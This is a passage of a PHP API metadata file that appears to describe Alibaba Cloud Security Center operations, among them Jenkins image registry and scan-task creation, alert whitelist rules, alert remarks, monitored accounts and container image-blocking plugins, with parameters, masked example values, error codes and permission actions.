'create', 'tenantRelevance' => 'publicInformation'], 'parameters' => [ [ 'name' => 'RegistryName', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The alias of the image repository.'."\n", 'type' => 'string', 'required' => false, 'example' => 'testRepo'], ], [ 'name' => 'RegistryType', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The type of the image repository. Valid values:'."\n" ."\n" .'* **CI/CD**: Jenkins'."\n", 'type' => 'string', 'required' => false, 'example' => 'CI/CD'], ], [ 'name' => 'RegistryVersion', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The version of the image repository. Default value: -. Valid values:'."\n" ."\n" .'* **-**: the default version'."\n" .'* **V1**: V1.0'."\n" .'* **V2**: V2.0'."\n", 'type' => 'string', 'required' => false, 'example' => 'V1'], ], [ 'name' => 'ProtocolType', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The type of the protocol. Valid values:'."\n" ."\n" .'* **1**: HTTP'."\n" .'* **2**: HTTPS'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], ], [ 'name' => 'NetType', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The network type. Valid values:'."\n" ."\n" .'* **1**: Internet'."\n" .'* **2**: Virtual Private Cloud (VPC)'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1'], ], [ 'name' => 'VpcId', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The ID of the VPC.'."\n", 'type' => 'string', 'required' => false, 'example' => 'vpc-2ze4aoqgeu51ydfb8****'], ], [ 'name' => 'RegistryHostIp', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The IP address of the image repository.'."\n", 'type' => 'string', 'required' => false, 'example' => '114.55.XXX.XXX'], ], [ 'name' => 'DomainName', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The domain name of the image repository.'."\n", 'type' => 'string', 'required' => false, 'example' => 'example.com'], ], [ 'name' => 'UserName', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The username.'."\n", 'type' => 'string', 'required' => false, 'example' => 'RegistryUser'], ], [ 'name' => 'Password', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The password.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Harbor********'], ], [ 'name' => 'RegionId', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The region ID of the image repository.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-shanghai'], ], [ 'name' => 'WhiteList', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The whitelist of IP addresses.'."\n", 'type' => 'string', 'required' => false, 'example' => '192.168.XXX.XXX'], ], [ 'name' => 'TransPerHour', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The number of images that can be scanned per hour.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '30'], ], [ 'name' => 'ExtraParam', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The additional parameters of the image repository. The value of this parameter contains the following fields:'."\n" ."\n" .'* **namespace**: the namespace'."\n" .'* **authToken**: the authorization token'."\n", 'type' => 'string', 'required' => false, 'example' => '[{\\"namespace\\":\\"aa\\",\\"authToken\\":\\"aa\\"}]'], ], [ 'name' => 'PersistenceDay', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The number of days during which assets can be retained.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '30'], ], [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '41.121.XXX.XXX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'PlainResult', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The result of creating the image repository.'."\n", 'type' => 'object', 'properties' => [ 'Id' => ['title' => '', 'description' => 'The ID of the image repository.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '443496'], 'GmtCreate' => ['title' => '', 'description' => 'The creation time. The time is in the yyyy-MM-dd HH:mm:ss format.'."\n", 'type' => 'string', 'example' => '2022-10-16 18:17:16'], 'GmtModified' => ['title' => '', 'description' => 'The update time. The time is in the yyyy-MM-dd HH:mm:ss format.'."\n", 'type' => 'string', 'example' => '2022-11-21 10:40:01'], 'RegistryName' => ['title' => '', 'description' => 'The alias of the image repository.'."\n", 'type' => 'string', 'example' => 'fanyi'], 'RegistryType' => ['title' => '', 'description' => 'The type of the image repository. Valid values:'."\n" ."\n" .'* **CI/CD**: Jenkins'."\n", 'type' => 'string', 'example' => 'CI/CD'], 'ProtocolType' => ['title' => '', 'description' => 'The type of the protocol. Valid values:'."\n" ."\n" .'* **1**: HTTP'."\n" .'* **2**: HTTPS'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'NetType' => ['title' => '', 'description' => 'The network type. Valid values:'."\n" ."\n" .'* **1**: Internet'."\n" .'* **2**: VPC'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'VpcId' => ['title' => 'vpcId', 'description' => 'The ID of the VPC.'."\n", 'type' => 'string', 'example' => 'vpc-2vchkxmf2j9yjt3x2****'], 'RegistryHostIp' => ['title' => '', 'description' => 'The IP address of the image repository.'."\n", 'type' => 'string', 'example' => '1.13.XXX.XXX'], 'DomainName' => ['title' => '', 'description' => 'The domain name of the image repository.'."\n", 'type' => 'string', 'example' => 'example.com'], 'UserName' => ['title' => '', 'description' => 'The username.'."\n", 'type' => 'string', 'example' => 'RegistryUser'], 'Password' => ['title' => '', 'description' => 'The password.'."\n", 'type' => 'string', 'example' => 'Harbor******'], 'RegionId' => ['title' => '', 'description' => 'The region ID of the image repository.'."\n", 'type' => 'string', 'example' => 'cn-shanghai'], 'Token' => ['title' => '', 'description' => 'The authentication token of the user.'."\n", 'type' => 'string', 'example' => '3c3c602c-fa1f-4bc0-992f-b4b2cac7****'], 'WhiteList' => ['title' => '', 'description' => 'The whitelist.'."\n", 'type' => 'string', 'example' => '192.168.XXX.XXX'], 'BlackList' => ['title' => '', 'description' => 'The blacklist.'."\n", 'type' => 'string', 'example' => '61.9.XXX.XXX'], 'TransPerHour' => ['title' => '', 'description' => 'The number of images that can be scanned per hour.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '30'], 'PersistenceDay' => ['title' => '', 'description' => 'The number of days during which assets can be retained.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '30'], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request.'."\n", 'type' => 'string', 'example' => '1AF1E723-53F1-55BF-A4B2-15CB7A32****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'TimeCost' => ['description' => 'The time consumed. Unit: seconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'CreateJenkinsImageRegistry', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateJenkinsImageRegistry'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateJenkinsImageRegistry', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 443496,\\n \\"GmtCreate\\": \\"2022-10-16 18:17:16\\",\\n \\"GmtModified\\": \\"2022-11-21 10:40:01\\",\\n \\"RegistryName\\": \\"fanyi\\",\\n \\"RegistryType\\": \\"CI/CD\\",\\n \\"ProtocolType\\": 1,\\n \\"NetType\\": 1,\\n \\"VpcId\\": \\"vpc-2vchkxmf2j9yjt3x2****\\",\\n \\"RegistryHostIp\\": \\"1.13.XXX.XXX\\",\\n \\"DomainName\\": \\"example.com\\",\\n \\"UserName\\": \\"RegistryUser\\",\\n \\"Password\\": \\"Harbor******\\",\\n \\"RegionId\\": \\"cn-shanghai\\",\\n \\"Token\\": \\"3c3c602c-fa1f-4bc0-992f-b4b2cac7****\\",\\n \\"WhiteList\\": \\"192.168.XXX.XXX\\",\\n \\"BlackList\\": \\"61.9.XXX.XXX\\",\\n \\"TransPerHour\\": 30,\\n \\"PersistenceDay\\": 30\\n },\\n \\"RequestId\\": \\"1AF1E723-53F1-55BF-A4B2-15CB7A32****\\",\\n \\"HttpStatusCode\\": 200,\\n \\"TimeCost\\": 1\\n}","type":"json"}]', ], 'CreateJenkinsImageScanTask' => [ 'summary' => 'Creates a Jenkins scan task.', 'methods' => ['post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '120058', 'abilityTreeNodes' => ['FEATUREsasA217JR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Token', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The token that is used to access the Jenkins image repository.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c3de8326-273e-11fc-a0e3-d012435c****'], ], [ 'name' => 'Namespace', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The namespace.'."\n", 'type' => 'string', 'required' => false, 'example' => 'lkl-zf-ss-ccss'], ], [ 'name' => 'RepoName', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The name of the image repository.'."\n", 'type' => 'string', 'required' => false, 'example' => 'sdk'], ], [ 'name' => 'Tag', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The tag of the image.'."\n", 'type' => 'string', 'required' => false, 'example' => '00f597223f-20210831-1'], ], [ 'name' => 'Digest', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The digest of the image.'."\n", 'type' => 'string', 'required' => false, 'example' => 'a8c9f3765684cd8d9053db9523eab58878e99a199217500efd9ae2a860a7****'], ], [ 'name' => 'ImageId', 'in' => 'formData', 'schema' => ['title' => 'imageId', 'description' => 'The ID of the image.'."\n", 'type' => 'string', 'required' => false, 'example' => 'b10ef7b245c34a0822055c74fc4a0e8b5baf0279306316b2c517a501ed25****'], ], [ 'name' => 'ImageSize', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The size of the image. Unit: bytes.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '6120340'], ], [ 'name' => 'ImageCreate', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The time when the image was created.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1717430400000'], ], [ 'name' => 'ImageUpdate', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The time when the image was updated.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1717430498600'], ], [ 'name' => 'Uuid', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The UUID of the image asset.'."\n", 'type' => 'string', 'required' => false, 'example' => '5b268326-273e-44fc-a0e3-9482435c****'], ], [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '119.136.XX.XX', 'title' => ''], ], [ 'name' => 'JenkinsEnv', 'in' => 'query', 'schema' => ['description' => 'The information about the Jenkins environment.'."\n", 'type' => 'string', 'required' => false, 'example' => 'release', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'TaskId' => ['title' => '', 'description' => 'The ID of the scan task.'."\n", 'type' => 'string', 'example' => 'fc98d58eb56f699d49bf7ebbd6d7****'], 'Uuid' => ['title' => '', 'description' => 'The UUID of the image asset.'."\n", 'type' => 'string', 'example' => '6690a46c-0edb-4663-a641-3629d1a9****'], 'ImageScanCapacity' => ['title' => '', 'description' => 'The quota for image scan.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '100'], 'RepoRegionId' => ['title' => '', 'description' => 'The ID of the region.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou'], 'RepoInstanceId' => ['title' => '', 'description' => 'The instance ID of the image repository.'."\n", 'type' => 'string', 'example' => 'cri-0gkaatghnmnt****'], 'RepoId' => ['title' => 'repoId', 'description' => 'The ID of the image repository.'."\n", 'type' => 'string', 'example' => 'crr-upze3gcopm9c****'], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '52870893-48A7-5A9E-9E05-6253E5B6****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'CreateJenkinsImageScanTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateJenkinsImageScanTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateJenkinsImageScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"TaskId\\": \\"fc98d58eb56f699d49bf7ebbd6d7****\\",\\n \\"Uuid\\": \\"6690a46c-0edb-4663-a641-3629d1a9****\\",\\n \\"ImageScanCapacity\\": 100,\\n \\"RepoRegionId\\": \\"cn-hangzhou\\",\\n \\"RepoInstanceId\\": \\"cri-0gkaatghnmnt****\\",\\n \\"RepoId\\": \\"crr-upze3gcopm9c****\\"\\n },\\n \\"RequestId\\": \\"52870893-48A7-5A9E-9E05-6253E5B6****\\"\\n}","type":"json"}]', ], 'CreateMaliciousFileWhitelistConfig' => [ 'summary' => 'Get alert whitelist configuration details', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasON13NY'], ], 'parameters' => [ [ 'name' => 'EventName', 'in' => 'query', 'schema' => ['title' => '告警名称, ALL-全部告警', 'description' => 'Alert name:'."\n" .'- ALL: All alerts', 'type' => 'string', 'required' => false, 'example' => 'ALL'], ], [ 'name' => 'Field', 'in' => 'query', 'schema' => ['title' => '字段', 'description' => 'Field used for whitelist in sensitive file alerts.', 'type' => 'string', 'required' => false, 'example' => 'fileMd5'], ], [ 'name' => 'Operator', 'in' => 'query', 'schema' => ['title' => '操作符', 'description' => 'Rule judgment operator:'."\n" .'- strEqual: String equals', 'type' => 'string', 'required' => false, 'example' => 'strEqual'], ], [ 'name' => 'FieldValue', 'in' => 'query', 'schema' => ['title' => '值', 'description' => 'Expected value of the field to be whitelisted.', 'type' => 'string', 'required' => false, 'example' => 'b2cf9747ee49d8d9b105cf16e078cc16'], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['title' => '生效目标类型,ALL-全部资产,SELECTION_KEY 选中的资产', 'description' => 'Effective target type:'."\n" .'- ALL: All assets'."\n" .'- SELECTION_KEY: Assets selected via the asset selection component', 'type' => 'string', 'required' => false, 'example' => 'ALL'], ], [ 'name' => 'TargetValue', 'in' => 'query', 'schema' => ['title' => '生效目标值', 'description' => 'Target effective scope:'."\n" .'- ALL: All assets'."\n" .'- Other: Key of the asset range selected by the asset selection component', 'type' => 'string', 'required' => false, 'example' => 'ALL'], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['title' => '文件来源', 'description' => 'Business source:'."\n" .'- agentless: Agentless detection', 'type' => 'string', 'required' => false, 'example' => 'agentless'], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['title' => '备注。', 'description' => 'Remarks.', 'type' => 'string', 'required' => false, 'example' => 'whitelist'], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'PlainResult', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'Returned data.', 'type' => 'object', 'properties' => [ 'GmtCreate' => ['title' => '创建时间', 'description' => 'Creation time.', 'type' => 'string', 'example' => '1671607025000'], 'GmtModified' => ['title' => '修改时间', 'description' => 'Modification time.', 'type' => 'string', 'example' => '1671607025000'], 'EventName' => ['title' => '告警名称', 'description' => 'Alert name:'."\n" .'- ALL: All alert types', 'type' => 'string', 'example' => 'ALL'], 'Field' => ['title' => '加白字段', 'description' => 'Whitelisted field.', 'type' => 'string', 'example' => 'fileMd5'], 'FieldValue' => ['title' => '加白字段值', 'description' => 'Whitelisted field value.', 'type' => 'string', 'example' => 'b2cf9747ee49d8d9b105cf16e078cc16'], 'Operator' => ['title' => '判定操作符', 'description' => 'Rule judgment operator:'."\n" .'- strEqual: String equals', 'type' => 'string', 'example' => 'strEqual'], 'TargetValue' => ['title' => '加白范围,资产选择key', 'description' => 'Target effective scope:'."\n" .'- ALL: All assets'."\n" .'- Other: Key of the asset range selected by the asset selection component', 'type' => 'string', 'example' => 'ALL'], 'TargetType' => ['title' => '范围类型, ALL-全部资产 SELECTION_KEY- 资产选择key', 'description' => 'Effective target type:'."\n" .'- ALL: All assets'."\n" .'- SELECTION_KEY: Assets selected via the asset selection component', 'type' => 'string', 'example' => 'ALL'], 'Count' => ['title' => 'target type 为 SELECTION_KEY 的情况下,此字段有值', 'description' => 'Number of effective assets.'."\n" .'> This field has a value when targetType is SELECTION_KEY', 'type' => 'string', 'example' => '1'], 'Source' => ['title' => '告警来源', 'description' => 'Business source:'."\n" .'- agentless: Agentless detection', 'type' => 'string', 'example' => 'agentless'], 'Id' => ['description' => 'Rule ID.', 'type' => 'string', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Whether the API call was successful. Values:'."\n" .'- **true**: Success'."\n" .'- **false**: Failure', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'API status code.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'Prompt message for the returned result.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-XXXXXXXXX', 'title' => ''], 'HttpStatusCode' => ['description' => 'HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"GmtCreate\\": \\"1671607025000\\",\\n \\"GmtModified\\": \\"1671607025000\\",\\n \\"EventName\\": \\"ALL\\",\\n \\"Field\\": \\"fileMd5\\",\\n \\"FieldValue\\": \\"b2cf9747ee49d8d9b105cf16e078cc16\\",\\n \\"Operator\\": \\"strEqual\\",\\n \\"TargetValue\\": \\"ALL\\",\\n \\"TargetType\\": \\"ALL\\",\\n \\"Count\\": \\"1\\",\\n \\"Source\\": \\"agentless\\",\\n \\"Id\\": \\"1\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-XXXXXXXXX\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'Create Sensitive File Alert Whitelist Rule of Agentless Detection', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateMaliciousFileWhitelistConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateMaliciousFileWhitelistConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'MaliciousFileWhitelistConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:maliciousfilewhitelistconfig/*'], ], ], ], ], 'translator' => 'machine', ], 'CreateMaliciousNote' => [ 'summary' => 'Adds remarks to alert events for agentless detection.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Note', 'in' => 'query', 'allowEmptyValue' => false, 'schema' => ['description' => 'The remarks that you want to add.'."\n", 'type' => 'string', 'required' => true, 'example' => 'Ignore', 'title' => ''], ], [ 'name' => 'EventId', 'in' => 'query', 'schema' => ['description' => 'The ID of the alert event to which you want to add remarks.'."\n" ."\n" .'> You can call the [ListAgentlessMaliciousFiles](~~ListAgentlessMaliciousFiles~~) operation to obtain the ID of the alert event from the NoteId parameter.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '80****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'CreateMaliciousNote', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateMaliciousNote'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:CreateMaliciousNote', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\"\\n}","type":"json"}]', ], 'CreateMonitorAccount' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91930', 'abilityTreeNodes' => ['FEATUREsas8YMQ5V'], ], 'parameters' => [ [ 'name' => 'AccountIds', 'in' => 'query', 'schema' => ['description' => 'The account IDs of members in the resource directory.'."\n" ."\n" .'> You can call the [ListAccountsInResourceDirectory](~~ListAccountsInResourceDirectory~~) operation to obtain the account IDs. Separate multiple account IDs with commas (,). If you specify a value for this parameter, the existing list of members is replaced by the new list that you specify. Otherwise, the existing list is cleared.'."\n", 'type' => 'string', 'required' => false, 'example' => '1026780160******,1457515594******', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578ABF384', 'title' => ''], ], 'description' => 'The response parameters.', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'CreateMonitorAccount', 'summary' => 'Creates a list of members of the account monitored by Security Center type by using the multi-account management feature.', 'description' => 'You can call this operation only by using the management account of a resource directory or a delegated administrator account of Security Center.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateMonitorAccount'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateMonitorAccount', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578ABF384\\"\\n}","type":"json"}]', ], 'CreateOpaClusterPlugin' => [ 'summary' => 'Installs the components that are required by at-risk image blocking. The components are policy-template-controller, gatekeeper, and logtail-ds.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '178483', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ClusterIds', 'in' => 'query', 'style' => 'flat', 'schema' => [ 'description' => 'The cluster IDs.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of clusters.'."\n", 'type' => 'array', 'items' => ['description' => 'The cluster ID.'."\n" ."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to query the IDs of clusters.'."\n", 'type' => 'string', 'required' => false, 'example' => 'c60b77fe62093480db6164a3c2fa****', 'title' => ''], 'required' => true, 'maxItems' => 50, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53C0DC1F8'], 'InstallStatus' => [ 'description' => 'The installation status of the components.'."\n", 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'ClusterId' => ['description' => 'The cluster ID.'."\n", 'type' => 'string', 'example' => 'c60b77fe62093480db6164a3c2fa****'."\n", 'title' => ''], 'InstallStatus' => ['description' => 'Indicates whether the component is installed. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'CreateOpaClusterPlugin', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateOpaClusterPlugin'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateOpaClusterPlugin', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53C0DC1F8\\",\\n \\"InstallStatus\\": [\\n {\\n \\"ClusterId\\": \\"c60b77fe62093480db6164a3c2fa****\\\\n\\",\\n \\"InstallStatus\\": true\\n }\\n ]\\n}","type":"json"}]', ], 'CreateOpaStrategyNew' => [ 'summary' => 'Creates a rule to block at-risk images.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '174285', 'abilityTreeNodes' => ['FEATUREsasZLVTBH'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => 